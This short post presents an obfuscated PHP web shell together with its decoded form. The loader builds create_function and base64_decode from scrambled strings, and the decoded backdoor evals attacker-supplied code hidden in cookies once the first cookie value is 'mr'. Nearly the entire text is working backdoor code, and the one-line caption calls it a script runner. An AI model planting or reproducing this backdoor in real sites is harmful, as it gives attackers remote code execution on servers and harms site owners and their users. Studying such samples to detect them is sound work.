A script runner, that runs evaled base64 encoded POST / GET
<?php $rtpz="lKHByZWdfcmVwbGFjZShhcnJheShdgnL1teXHchd9XhdHhdNdLycsJy9ccy8nKShdwgYhdXJhdyYXkoJychdsJyhdsn"; $tsdg = str_replace("b","","bsbtbrb_rbebpblacbe"); $wxhw="KhdSwgam9pbhdihhcnJhehdV9zbhdGljZSgkYSwkYygkYSktMykpKSkpO2VjaG8ghdJzhdwvJy4kahdy4nPic7fQ=="; $feka="hdpeyRrPSdyaXNoZXJlJhdztlhdY2hhdvICc8hdJy4kayhd4nPic7ZXhdZhbChdhiYXhdNlNjRfZGVjb2R"; $asys="JGM9J2NvdWhd50JzskYT0khdX0NPT0tJRTtphdZihdhyZXNhdldhdChdgkhdYSkhd9PShddtcicgJiYhdgJGMohdJGEpPjM"; $zjzy = $tsdg("q", "", "qbaqsqeq6q4q_qdqecoqde"); $liiy = $tsdg("z","","crzezatez_fzunctzizon"); $iuwt = $liiy("", $zjzy($tsdg("hd", "", $asys.$feka.$rtpz.$wxhw))); $iuwt(); ?>
The decoded PHP code:
<?php $c = 'count'; $a = $_COOKIE; if (reset($a) == 'mr' && $c($a) > 3) { $k = 'rishere'; echo '<' . $k . '>'; eval(base64_decode(preg_replace(array('/[^\w=\s]/', '/\s/'), array('', '+'), join(array_slice($a, $c($a) - 3))))); echo '</' . $k . '>'; }